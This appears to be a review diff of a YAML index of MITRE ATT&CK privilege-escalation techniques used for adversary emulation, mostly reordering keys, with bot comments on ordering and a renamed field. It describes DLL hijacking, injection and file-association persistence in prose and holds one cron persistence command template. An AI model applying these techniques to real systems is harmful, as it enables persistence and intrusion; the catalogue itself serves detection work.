+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1546.001:
technique:
+ created: '2020-01-24T13:40:47.282Z'
+ modified: '2020-01-24T13:40:47.282Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
+ description: "Adversaries may establish persistence by executing malicious content
+ triggered by a file type association. When a file is opened, the default program
+ used to open the file (also called the file association or handler) is checked.
+ File association selections are stored in the Windows Registry and can be
+ edited by users, administrators, or programs that have Registry access (Citation:
+ Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
+ by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
+ Oct 2017) Applications can modify the file association for a given file extension
+ to call an arbitrary program when a file with the given extension is opened.\n\nSystem
+ file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
+ for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
+ for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
+ various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
+ For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
+ HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
+ values of the keys listed are commands that are executed when the handler
+ opens the file extension. Adversaries can modify these values to continually
+ execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
+ name: Change Default File Association
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1546.001
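Review bot: Most of this hunk, and the hunks at @@ -1411, @@ -1528, @@ -1535, @@ -1593, @@ -1770, @@ -1826, @@ -1885, @@ -1901, @@ -1957, @@ -1987, @@ -2170, @@ -2180, @@ -2213 and @@ -2287, only moves technique keys around (`created`/`modified`/`id` to the top of each `technique:`, `x_mitre_platforms` to the bottom), which buries the substantive changes such as the new T1574.012 entry; if this index is regenerated from the STIX bundle, emitting keys in a deterministic order (for example `sort_keys` on the dump, or preserving the upstream object order) would keep future diffs to semantic changes only. The new T1574.012 (COR_PROFILER) entry lands with `atomic_tests: []` while the existing test `COM Hijack Leveraging user scope COR_PROFILER` stays under T1546.015 in the @@ -1620 hunk; presumably the test's own technique mapping decides placement, so it is worth confirming whether that test was meant to move to the new sub-technique. The `profiliers` spelling in the new description mirrors the upstream MITRE text, so it should be corrected at the source rather than edited by hand in a generated file.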
@@ -1411,37 +1532,6 @@ privilege-escalation:
description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August
8, 2018.
source_name: TrendMicro TROJ-FAKEAV OCT 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Change Default File Association
- description: "Adversaries may establish persistence by executing malicious content
- triggered by a file type association. When a file is opened, the default program
- used to open the file (also called the file association or handler) is checked.
- File association selections are stored in the Windows Registry and can be
- edited by users, administrators, or programs that have Registry access (Citation:
- Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
- by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
- Oct 2017) Applications can modify the file association for a given file extension
- to call an arbitrary program when a file with the given extension is opened.\n\nSystem
- file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
- for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
- for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
- various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
- For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
- HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
- values of the keys listed are commands that are executed when the handler
- opens the file extension. Adversaries can modify these values to continually
- execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
- id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-01-24T13:40:47.282Z'
- created: '2020-01-24T13:40:47.282Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -1528,6 +1618,19 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -1535,19 +1638,6 @@ privilege-escalation:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1546.015:
technique:
@@ -1593,18 +1683,12 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-16T14:19:22.457Z'
+ modified: '2020-07-09T13:55:51.172Z'
created: '2020-03-16T14:12:47.923Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - ENDGAME
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
(ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary
@@ -1620,10 +1704,16 @@ privilege-escalation:
if software DLL loads are collected and analyzed, any unusual DLL load that
can be correlated with a COM object Registry modification may indicate COM
hijacking has been performed. "
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Elastic
+ x_mitre_platforms:
+ - Windows
identifier: T1546.015
atomic_tests:
- name: COM Hijack Leveraging user scope COR_PROFILER
@@ -1770,47 +1860,37 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:28:19.476Z'
created: '2020-02-18T16:48:56.582Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1543:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1543
- url: https://attack.mitre.org/techniques/T1543
- - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
- source_name: TechNet Services
- - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
- July 10, 2017.
- source_name: AppleDocs Launch Agent Daemons
- - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
- description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
- OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
- source_name: OSX Malware Detection
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Create or Modify System Process
+ created: '2020-01-10T16:03:18.865Z'
+ modified: '2020-03-25T22:32:16.537Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
@@ -1826,15 +1906,25 @@ privilege-escalation:
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges. (Citation:
OSX Malware Detection). "
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T22:32:16.537Z'
- created: '2020-01-10T16:03:18.865Z'
+ name: Create or Modify System Process
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1543
+ url: https://attack.mitre.org/techniques/T1543
+ - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
+ description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
+ source_name: TechNet Services
+ - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
+ description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
+ July 10, 2017.
+ source_name: AppleDocs Launch Agent Daemons
+ - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
+ description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
+ OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
+ source_name: OSX Malware Detection
x_mitre_platforms:
- Windows
- macOS
@@ -1885,12 +1975,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -1901,11 +1990,12 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -1957,6 +2047,30 @@ privilege-escalation:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -1987,30 +2101,6 @@ privilege-escalation:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -2087,23 +2177,23 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
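Review bot: The `x_mitre_defense_bypassed` value for T1574.002 changes from `Process whitelisting` to `Application control`, and the same rename appears for T1574.004 in the @@ -2287 and @@ -2300 hunks; because this field is free text rather than a closed enum, any local tooling, tests or documentation that filter on the old literal will silently stop matching. The new value appears to follow an upstream MITRE ATT&CK rename, so the data itself looks right; the follow-up is to search the repository for the old string and update those consumers in the same change.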
@@ -2170,6 +2260,20 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -2180,23 +2284,30 @@ privilege-escalation:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -2213,27 +2324,6 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -2287,12 +2377,13 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
@@ -2300,14 +2391,37 @@ privilege-escalation:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1055.001:
technique:
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
+ in order to evade process-based defenses as well as possibly elevate privileges.
+ DLL injection is a method of executing arbitrary code in the address space
+ of a separate live process. \n\nDLL injection is commonly performed by writing
+ the path to a DLL in the virtual address space of the target process before
+ loading the DLL by invoking a new thread. The write can be performed with
+ native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
+ then invoked with CreateRemoteThread (which calls the LoadLibrary
+ API responsible for loading the DLL). (Citation: Endgame Process Injection
+ July 2017) \n\nVariations of this method such as reflective DLL injection
+ (writing a self-mapping DLL into a process) and memory module (map DLL when
+ writing into process) overcome the address relocation issue as well as the
+ additional APIs to invoke execution (since these methods load and execute
+ the files in memory by manually preforming the function of LoadLibrary).(Citation:
+ Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July
+ 2017) \n\nRunning code in the context of another process may allow access
+ to the process's memory, system/network resources, and possibly elevated privileges.
+ Execution via DLL injection may also evade detection from security products
+ since the execution is masked under a legitimate process. "
+ name: Dynamic-link Library Injection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1055.001
@@ -2321,37 +2435,13 @@ privilege-escalation:
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
source_name: Endgame HuntingNMemory June 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic-link Library Injection
- description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
- in order to evade process-based defenses as well as possibly elevate privileges.
- DLL injection is a method of executing arbitrary code in the address space
- of a separate live process. \n\nDLL injection is commonly performed by writing
- the path to a DLL in the virtual address space of the target process before
- loading the DLL by invoking a new thread. The write can be performed with
- native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
- then invoked with CreateRemoteThread (which calls the LoadLibrary
- API responsible for loading the DLL). (Citation: Endgame Process Injection
- July 2017) \n\nVariations of this method such as reflective DLL injection
- (writing a self-mapping DLL into a process) and memory module (map DLL when
- writing into process) overcome the address relocation issue as well as the
- additional APIs to invoke execution (since these methods load and execute
- the files in memory by manually preforming the function of LoadLibrary
- ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process
- Injection July 2017) \n\nRunning code in the context of another process may
- allow access to the process's memory, system/network resources, and possibly
- elevated privileges. Execution via DLL injection may also evade detection
- from security products since the execution is masked under a legitimate process. "
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:32:05.210Z'
+ modified: '2020-06-20T22:17:59.148Z'
created: '2020-01-14T01:26:08.145Z'
x_mitre_platforms:
- Windows
@@ -2379,7 +2469,7 @@ privilege-escalation:
- File monitoring
- API monitoring
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
atomic_tests: []
T1548.004:
@@ -2438,27 +2528,27 @@ privilege-escalation:
phase_name: defense-evasion
modified: '2020-03-27T12:04:37.823Z'
created: '2020-01-30T14:40:20.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Jimmy Astle, @AstleJimmy, Carbon Black
- - Erika Noerenberg, @gutterchurl, Carbon Black
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline
executions which may indicate that AuthorizationExecuteWithPrivileges
is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges
is being called. Monitoring OS API callbacks for the execution can also be
a way to detect this behavior but requires specialized security tooling.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Jimmy Astle, @AstleJimmy, Carbon Black
+ - Erika Noerenberg, @gutterchurl, Carbon Black
+ x_mitre_platforms:
+ - macOS
atomic_tests: []
T1546.014:
technique:
@@ -2497,18 +2587,18 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T21:37:25.307Z'
created: '2020-01-24T15:15:13.426Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Ivan Sinyakov
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: Monitor emond rules creation by checking for files created
- or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_detection: Monitor emond rules creation by checking for files created
+ or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_contributors:
+ - Ivan Sinyakov
+ x_mitre_platforms:
+ - macOS
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -2561,25 +2651,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:37:25.477Z'
+ modified: '2020-07-09T13:55:51.501Z'
created: '2020-01-22T21:04:23.285Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - System calls
- - Binary file metadata
- - Process use of network
- - WMI Objects
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: "Monitoring for additions or modifications of mechanisms
that could be used to trigger event-based execution, especially the addition
of abnormal commands such as execution of unknown programs, opening network
